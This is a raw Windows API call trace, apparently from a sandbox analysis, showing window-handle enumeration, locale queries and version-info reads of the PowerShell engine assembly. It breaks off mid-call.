[0230.019] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0xc0 [0230.019] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x5f8 [0230.019] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x5b0 [0230.019] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x3f0 [0230.019] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x558 [0230.019] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x5f0 [0230.019] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x768 [0230.019] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x56c [0230.020] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x520 [0230.020] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x564 [0230.020] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x578 [0230.020] GetWindowThreadProcessId (in: hWnd=0x10166, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x548 [0230.020] GetWindowThreadProcessId (in: hWnd=0x10162, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x414 [0230.020] GetWindowThreadProcessId (in: hWnd=0x1015e, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x514 [0230.020] GetWindowThreadProcessId (in: hWnd=0x40152, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x90 [0230.020] GetWindowThreadProcessId (in: hWnd=0x80154, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x528 [0230.021] GetWindowThreadProcessId (in: hWnd=0x30102, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x7fc [0230.021] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x468 [0230.021] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x50c [0230.021] GetWindowThreadProcessId (in: hWnd=0x10144, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x46c [0230.021] GetWindowThreadProcessId (in: hWnd=0x2013a, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x50c [0230.021] GetWindowThreadProcessId (in: hWnd=0x1012e, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x46c [0230.021] GetWindowThreadProcessId (in: hWnd=0x10124, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x50c [0230.021] GetWindowThreadProcessId (in: hWnd=0x10118, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x468 [0230.022] GetWindowThreadProcessId (in: hWnd=0x10116, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x468 [0230.022] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x544 [0230.022] GetWindowThreadProcessId (in: hWnd=0x2001c, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x76c [0230.022] GetWindowThreadProcessId (in: hWnd=0x200a2, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x584 [0230.022] GetWindowThreadProcessId (in: hWnd=0x10106, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x570 [0230.022] GetWindowThreadProcessId (in: hWnd=0x10100, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x45c [0230.022] GetWindowThreadProcessId (in: hWnd=0x100fe, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x53c [0230.022] GetWindowThreadProcessId (in: hWnd=0x5008e, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x4c4 [0230.023] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x508 [0230.023] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x4c4 [0230.023] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x4c4 [0230.023] GetWindowThreadProcessId (in: hWnd=0x10068, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x4c4 [0230.023] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x7ec [0230.023] GetWindowThreadProcessId (in: hWnd=0x10064, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x4c4 [0230.023] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x4d8 [0230.023] GetWindowThreadProcessId (in: hWnd=0x1004c, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x4c4 [0230.024] GetWindowThreadProcessId (in: hWnd=0x10044, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x45c [0230.024] GetWindowThreadProcessId (in: hWnd=0x20040, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x45c [0230.024] GetWindowThreadProcessId (in: hWnd=0x3003e, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x44c [0230.024] GetWindowThreadProcessId (in: hWnd=0x20022, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x7d4 [0230.024] GetWindowThreadProcessId (in: hWnd=0x2020c, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0xae8 [0230.024] GetWindowThreadProcessId (in: hWnd=0x100ec, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x45c [0230.024] GetWindowThreadProcessId (in: hWnd=0x10136, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x5a4 [0230.024] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x4c4 [0230.025] GetWindowThreadProcessId (in: hWnd=0x1004e, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x4c4 [0230.025] GetWindowThreadProcessId (in: hWnd=0x102ca, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0xae8 [0230.025] GetWindowThreadProcessId (in: hWnd=0x20256, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0xae8 [0230.025] GetWindowThreadProcessId (in: hWnd=0x2037a, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0xa0c [0230.025] GetWindowThreadProcessId (in: hWnd=0x2037e, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0xa0c [0230.025] GetWindowThreadProcessId (in: hWnd=0x20354, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x484 [0230.025] GetWindowThreadProcessId (in: hWnd=0x10250, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0xaa8 [0230.025] GetWindowThreadProcessId (in: hWnd=0x1024c, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0xa98 [0230.026] GetWindowThreadProcessId (in: hWnd=0x10248, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0xa88 [0230.026] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0xa78 [0230.026] GetWindowThreadProcessId (in: hWnd=0x10240, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0xa68 [0230.026] GetWindowThreadProcessId (in: hWnd=0x1023c, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0xa58 [0230.026] GetWindowThreadProcessId (in: hWnd=0x10238, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0xa48 [0230.026] GetWindowThreadProcessId (in: hWnd=0x10234, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0xa38 [0230.026] GetWindowThreadProcessId (in: hWnd=0x10230, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0xa28 [0230.026] GetWindowThreadProcessId (in: hWnd=0x1022c, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0xa18 [0230.026] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0xa08 [0230.027] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x9f8 [0230.027] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x9e8 [0230.027] GetWindowThreadProcessId (in: hWnd=0x1021a, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x9d8 [0230.027] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x9c8 [0230.027] GetWindowThreadProcessId (in: hWnd=0x10212, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x9b4 [0230.027] GetWindowThreadProcessId (in: hWnd=0x1020e, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x9a4 [0230.027] GetWindowThreadProcessId (in: hWnd=0x10208, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x994 [0230.027] GetWindowThreadProcessId (in: hWnd=0x10204, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x984 [0230.027] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x974 [0230.027] GetWindowThreadProcessId (in: hWnd=0x101fc, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x964 [0230.027] GetWindowThreadProcessId (in: hWnd=0x101f8, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x954 [0230.028] GetWindowThreadProcessId (in: hWnd=0x101f4, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x944 [0230.028] GetWindowThreadProcessId (in: hWnd=0x101f0, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x934 [0230.028] GetWindowThreadProcessId (in: hWnd=0x101ec, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x924 [0230.028] GetWindowThreadProcessId (in: hWnd=0x101e8, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x914 [0230.028] GetWindowThreadProcessId (in: hWnd=0x101e4, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x904 [0230.028] GetWindowThreadProcessId (in: hWnd=0x101e0, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x8f4 [0230.028] GetWindowThreadProcessId (in: hWnd=0x101dc, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x8e4 [0230.028] GetWindowThreadProcessId (in: hWnd=0x101d8, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x8d4 [0230.028] GetWindowThreadProcessId (in: hWnd=0x101d4, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x8c4 [0230.029] GetWindowThreadProcessId (in: hWnd=0x101d0, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x8b4 [0230.029] GetWindowThreadProcessId (in: hWnd=0x101cc, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x8a4 [0230.029] GetWindowThreadProcessId (in: hWnd=0x101c8, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x894 [0230.029] GetWindowThreadProcessId (in: hWnd=0x101c4, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x884 [0230.029] GetWindowThreadProcessId (in: hWnd=0x101c0, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x874 [0230.029] GetWindowThreadProcessId (in: hWnd=0x101bc, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x864 [0230.029] GetWindowThreadProcessId (in: hWnd=0x101b8, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x854 [0230.029] GetWindowThreadProcessId (in: hWnd=0x101b4, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x844 [0230.029] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x834 [0230.029] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x824 [0230.030] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x814 [0230.030] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x804 [0230.030] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x7bc [0230.030] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x1c4 [0230.030] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x2a8 [0230.030] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0xc0 [0230.030] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x5f8 [0230.030] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x5b0 [0230.030] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x3f0 [0230.030] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x558 [0230.031] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x5f0 [0230.031] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x768 [0230.031] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x56c [0230.031] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x520 [0230.031] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x564 [0230.031] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x578 [0230.031] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x548 [0230.031] GetWindowThreadProcessId (in: hWnd=0x10164, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x414 [0230.032] GetWindowThreadProcessId (in: hWnd=0x10160, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x514 [0230.032] GetWindowThreadProcessId (in: hWnd=0x300fa, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x90 [0230.032] GetWindowThreadProcessId (in: hWnd=0x40156, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x528 [0230.032] GetWindowThreadProcessId (in: hWnd=0x70150, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x7fc [0230.032] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x46c [0230.032] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x50c [0230.032] GetWindowThreadProcessId (in: hWnd=0x1011a, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x468 [0230.032] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x544 [0230.032] GetWindowThreadProcessId (in: hWnd=0x20016, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x76c [0230.032] GetWindowThreadProcessId (in: hWnd=0x1010a, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x584 [0230.033] GetWindowThreadProcessId (in: hWnd=0x10104, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x45c [0230.033] GetWindowThreadProcessId (in: hWnd=0x20024, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x7ec [0230.033] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x4d8 [0230.033] GetWindowThreadProcessId (in: hWnd=0x10042, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x45c [0230.033] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x7d4 [0230.048] WerSetFlags () returned 0x0 [0230.070] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1 [0230.070] CoTaskMemFree (pv=0x0) [0230.071] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x16d9e8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x16d9e0 | out: pulNumLanguages=0x16d9e8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x16d9e0) returned 1 [0230.071] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x16d9e8, pwszLanguagesBuffer=0x2ea2ac0, pcchLanguagesBuffer=0x16d9e0 | out: pulNumLanguages=0x16d9e8, pwszLanguagesBuffer=0x2ea2ac0, pcchLanguagesBuffer=0x16d9e0) returned 1 [0230.083] CoTaskMemAlloc (cb=0x24) returned 0x381d70 [0230.083] GetUserDefaultLocaleName (in: lpLocaleName=0x381d70, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6 [0230.083] CoTaskMemFree (pv=0x381d70) [0230.125] CoTaskMemAlloc (cb=0x104) returned 0x343650 [0230.125] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343650, nSize=0x80 | out: lpBuffer="") returned 0x0 [0230.125] CoTaskMemFree (pv=0x343650) [0230.133] CoTaskMemAlloc (cb=0x104) returned 0x343650 [0230.134] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343650, nSize=0x80 | out: lpBuffer="") returned 0x0 [0230.134] CoTaskMemFree (pv=0x343650) [0230.138] CoTaskMemAlloc (cb=0x104) returned 0x343650 [0230.138] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343650, nSize=0x80 | out: lpBuffer="") returned 0x0 [0230.138] CoTaskMemFree (pv=0x343650) [0230.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0230.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0230.158] SetErrorMode (uMode=0x1) returned 0x1 [0230.158] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x16d660 | out: lpFileInformation=0x16d660*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1 [0230.159] SetErrorMode (uMode=0x1) returned 0x1 [0230.159] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x16d8d0 | out: lpdwHandle=0x16d8d0) returned 0x94c [0230.160] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2ea6350 | out: lpData=0x2ea6350) returned 1 [0230.161] VerQueryValueW (in: pBlock=0x2ea6350, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x16d848, puLen=0x16d840 | out: lplpBuffer=0x16d848*=0x2ea63ec, puLen=0x16d840) returned 1 [0230.161] VerQueryValueW (in: pBlock=0x2ea6350, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x16d7b8, puLen=0x16d7b0 | out: lplpBuffer=0x16d7b8*=0x2ea64c8, puLen=0x16d7b0) returned 1 [0230.161] lstrlenW (lpString="Microsoft Corporation") returned 21 [0230.161] CoTaskMemAlloc (cb=0x2e) returned 0x388710 [0230.161] lstrcpyW (in: lpString1=0x388710, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation" [0230.161] CoTaskMemFree (pv=0x388710) [0230.161] VerQueryValueW (in: pBlock=0x2ea6350, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x16d7b8, puLen=0x16d7b0 | out: lplpBuffer=0x16d7b8*=0x2ea651c, puLen=0x16d7b0) returned 1 [0230.161] lstrlenW (lpString="System.Management.Automation") returned 28 [0230.161] CoTaskMemAlloc (cb=0x3c) returned 0x389ff0 [0230.161] lstrcpyW (in: lpString1=0x389ff0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation" [0230.162] CoTaskMemFree (pv=0x389ff0) [0230.162] VerQueryValueW (in: pBlock=0x2ea6350, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x16d7b8, puLen=0x16d7b0 | out: lplpBuffer=0x16d7b8*=0x2ea6578, puLen=0x16d7b0) returned 1 [0230.162] lstrlenW (lpString="6.1.7601.17514") returned 14 [0230.162] CoTaskMemAlloc (cb=0x20) returned 0x381dd0 [0230.162] lstrcpyW (in: lpString1=0x381dd0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0230.162] CoTaskMemFree (pv=0x381dd0) [0230.162] VerQueryValueW (in: pBlock=0x2ea6350, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x16d7b8, puLen=0x16d7b0 | out: lplpBuffer=0x16d7b8*=0x2ea65b8, puLen=0x16d7b0) returned 1 [0230.162] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0230.162] CoTaskMemAlloc (cb=0x44) returned 0x389ff0 [0230.162] lstrcpyW (in: lpString1=0x389ff0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0230.162] CoTaskMemFree (pv=0x389ff0) [0230.162] VerQueryValueW (in: pBlock=0x2ea6350, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x16d7b8, puLen=0x16d7b0 | out: lplpBuffer=0x16d7b8*=0x2ea6620, puLen=0x16d7b0) returned 1 [0230.162] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57 [0230.162] CoTaskMemAlloc (cb=0x76) returned 0x31e620 [0230.162] lstrcpyW (in: lpString1=0x31e620, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved." [0230.162] CoTaskMemFree (pv=0x31e620) [0230.162] VerQueryValueW (in: pBlock=0x2ea6350, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x16d7b8, puLen=0x16d7b0 | out: lplpBuffer=0x16d7b8*=0x2ea66bc, puLen=0x16d7b0) returned 1 [0230.162] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0230.162] CoTaskMemAlloc (cb=0x44) returned 0x389ff0 [0230.162] lstrcpyW (in: lpString1=0x389ff0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0230.162] CoTaskMemFree (pv=0x389ff0) [0230.162] VerQueryValueW (in: pBlock=0x2ea6350, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x16d7b8, puLen=0x16d7b0 | out: lplpBuffer=0x16d7b8*=0x2ea6720, puLen=0x16d7b0) returned 1 [0230.162] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42 [0230.162] CoTaskMemAlloc (cb=0x58) returned 0x2df5a0 [0230.163] lstrcpyW (in: lpString1=0x2df5a0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System" [0230.163] CoTaskMemFree (pv=0x2df5a0) [0230.163] VerQueryValueW (in: pBlock=0x2ea6350, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x16d7b8, puLen=0x16d7b0 | out: lplpBuffer=0x16d7b8*=0x2ea679c, puLen=0x16d7b0) returned 1 [0230.163] lstrlenW (lpString="6.1.7601.17514") returned 14 [0230.163] CoTaskMemAlloc (cb=0x20) returned 0x381dd0 [0230.163] lstrcpyW (in: lpString1=0x381dd0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0230.163] CoTaskMemFree (pv=0x381dd0) [0230.163] VerQueryValueW (in: pBlock=0x2ea6350, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x16d7b8, puLen=0x16d7b0 | out: lplpBuffer=0x16d7b8*=0x2ea6444, puLen=0x16d7b0) returned 1 [0230.163] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49 [0230.163] CoTaskMemAlloc (cb=0x66) returned 0x379cd0 [0230.163] lstrcpyW (in: lpString1=0x379cd0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly" [0230.163] CoTaskMemFree (pv=0x379cd0) [0230.163] VerQueryValueW (in: pBlock=0x2ea6350, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x16d7b8, puLen=0x16d7b0 | out: lplpBuffer=0x16d7b8*=0x0, puLen=0x16d7b0) returned 0 [0230.163] VerQueryValueW (in: pBlock=0x2ea6350, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x16d7b8, puLen=0x16d7b0 | out: lplpBuffer=0x16d7b8*=0x0, puLen=0x16d7b0) returned 0 [0230.163] VerQueryValueW (in: pBlock=0x2ea6350, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x16d7b8, puLen=0x16d7b0 | out: lplpBuffer=0x16d7b8*=0x0, puLen=0x16d7b0) returned 0 [0230.163] VerQueryValueW (in: pBlock=0x2ea6350, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x16d788, puLen=0x16d780 | out: lplpBuffer=0x16d788*=0x2ea63ec, puLen=0x16d780) returned 1 [0230.163] CoTaskMemAlloc (cb=0x204) returned 